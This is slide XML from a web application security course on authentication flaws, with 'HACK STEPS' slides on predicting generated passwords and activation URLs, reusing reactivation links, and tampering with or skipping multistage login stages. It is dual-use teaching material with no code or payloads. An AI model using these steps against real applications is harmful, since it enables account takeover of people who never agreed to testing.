                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Results in predictable passwords that attackers can break</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>More common on intranet-based corporate applications— for example, where every employee has an account created on their behalf, and receives a printed notification of their password.</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0" name="Predictable Initial Passwords"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Predictable Initial Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1521" name="HACK STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>If passwords are generated by the application, try to obtain several passwords in quick succession and determine whether any sequence or pattern can be discerned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>If so, extrapolate the pattern to obtain a list of passwords for other application users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>If passwords demonstrate a pattern that can be correlated with usernames, you can try to log in using known or guessed usernames and the corresponding inferred passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Otherwise, you can use the list of inferred passwords as the basis for a</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3" name="Insecure Distribution of Credentials"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="822959">
              <a:defRPr sz="4860"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Insecure Distribution of Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1524" name="If the message distributed contains both username and password, there is no time limit on their use, and there is no requirement for the user to change password on first login, then it is highly likely that a large number, even a majority, of application users will not modify their initial credentials and that the distribution messages will remain in existence for a lengthy period during which they may be accessed by an unauthorized party."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="374072" indent="-374072">
              <a:defRPr sz="3000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If the message distributed contains both username and password, there is no time limit on their use, and there is no requirement for the user to change password on first login, then it is highly likely that a large number, even a majority, of application users will not modify their initial credentials and that the distribution messages will remain in existence for a lengthy period during which they may be accessed by an unauthorized party. </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6" name="Insecure Distribution of Credentials"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="822959">
              <a:defRPr sz="4860"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Insecure Distribution of Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1527" name="HACK STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014052"/>
            <a:ext cx="8812666" cy="5439067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>Obtain a new account. If you are not required to set all credentials during registration, determine the means by which the application distributes credentials to new users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>If an account activation URL is used, try to register several new accounts in close succession and identify any sequence in the URLs you receive. If a pattern can be determined, try to predict the activation URLs sent to recent and forthcoming users, and attempt to use these URLs to take ownership of their accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>Try to reuse a single reactivation URL multiple times, and see if the application allows this. If not, try locking out the target account before reusing the URL, and see if it now works.</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9" name="Implementation Flaws in Authentication"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2456463" y="2552796"/>
            <a:ext cx="8140044" cy="2599951"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Implementation Flaws in Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1530" name="More subtle and harder to detect"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2456461" y="5314306"/>
            <a:ext cx="8123990" cy="2167468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>More subtle and harder to detect</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2" name="Fail-Open Login Mechanisms"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Fail-Open Login Mechanisms </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1533" name="Changing the log-in code to find any design flaws…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="548640" indent="-548640">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2600"/>
            </a:pPr>
            <a:r>
              <a:t>Changing the log-in code to find any design flaws</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379827" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Perform a complete, valid login using an account you control. Record every piece of data submitted to the application, and every response received, using your intercepting proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379827" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Repeat the login process numerous times, modifying pieces of the data submitted in unexpected ways. For example, for each request parameter or cookie sent by the client:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="731520" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1600"/>
            </a:pPr>
            <a:r>
              <a:t>Submit an empty string as the value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="731520" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1600"/>
            </a:pPr>
            <a:r>
              <a:t>Remove the name/value pair altogether.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="731520" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1600"/>
            </a:pPr>
            <a:r>
              <a:t>Submit very long and very short values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="731520" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1600"/>
            </a:pPr>
            <a:r>
              <a:t>Submit strings instead of numbers and vice versa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="731520" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1600"/>
            </a:pPr>
            <a:r>
              <a:t>Submit the same item multiple times, with the same and different values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379827" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>For each malformed request submitted, review closely the application’s response to identify any divergences from the base case.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379827" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Feed these observations back into framing your test cases. When one modification causes a change in behavior, try to combine this with other changes to push the application’s logic to its limits.</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5" name="Defects in Multistage Login Mechanisms"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Defects in Multistage Login Mechanisms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536" name="Elaborate login mechanisms involving multiple stages:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="374072" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Elaborate login mechanisms involving multiple stages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Entry of a username and password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>A challenge for specific digits from a PIN or a memorable word.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>The submission of a value displayed on a changing physical token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374072" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>In several cases where a combination of flaws is present, multistage logins can even result in a solution that is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>less </a:t>
            </a:r>
            <a:r>
              <a:t>secure than a normal login based on username and password.</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8" name="Defects in Multistage Login Mechanisms"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Defects in Multistage Login Mechanisms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1539" name="Flaws:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:t>Flaws:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Attackers may bypass stages in the login if the application is designed to assume that previous logins were correct.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Attackers may interfere with login transition red flags and modify application to allow procession with only partial credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Attackers may use multiple identities and passwords on the same user identity at different stages of the login process.  </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1" name="Defects in Multistage Login Mechanisms"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Defects in Multistage Login Mechanisms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1542" name="HACK STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>Perform a complete, valid login using an account you control. Record every piece of data submitted to the application using your intercepting proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>Identify each distinct stage of the login and the data that is collected at each stage. Determine whether any single piece of information is collected more than once or is ever transmitted back to the client and resubmitted, via a hidden form field, cookie, or preset URL parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>Repeat the login process numerous times with various malformed requests:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="745587" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Try performing the login steps in a different sequence.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="745587" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Try proceeding directly to any given stage and continuing from there.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="745587" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Try skipping each stage and continuing with the next.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="745587" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Use your imagination to think of further ways of accessing the different stages that the developers may not have anticipated.</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9" name="A1:2017 - Injection…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95409" y="1270000"/>
            <a:ext cx="7221635" cy="7213600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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A1:2017 - Injection</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A2:2017 - Broken Authentication</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A3:2017 - Sensitive Data Exposure</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A4:2017 - XML External Entities (XXE)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A5:2017 - Broken Access Control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A6:2017 - Security Misconfiguration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A7:2017 - Cross-Site Scripting (XSS)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A8:2017 - Insecure Deserialization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A9:2017 - Using Components with Known Vulnerabilities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A10:2017 - Insufficient Logging &amp; Monitoring</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="M1: 2016 - Improper Platform Usage…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386110" y="1270000"/>
            <a:ext cx="5364712" cy="67127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M1: 2016 - Improper Platform Usage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M2: 2016 - Insecure Data Storage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M3: 2016 - Insecure Communication</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M4: 2016 - Insecure Authentication</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M5: 2016 - Insufficient Cryptography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M6: 2016 - Insecure Authorization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M7: 2016 - Client Code Quality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M8: 2016 - Code Tampering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M9: 2016 - Reverse Engineering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M10: 2016 - Extraneous Functionality </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4479340" y="3430043"/>
            <a:ext cx="3064674" cy="236420"/>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622" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4479340" y="3710872"/>
            <a:ext cx="3063634" cy="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623" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4471531" y="3796911"/>
            <a:ext cx="3081826" cy="599590"/>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624" name="Information Disclosure"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3667163" y="1414953"/>
            <a:ext cx="468767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Information Disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4471489" y="3796911"/>
            <a:ext cx="2877953" cy="2170118"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pP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4" name="Defects in Multistage Login Mechanisms"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Defects in Multistage Login Mechanisms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
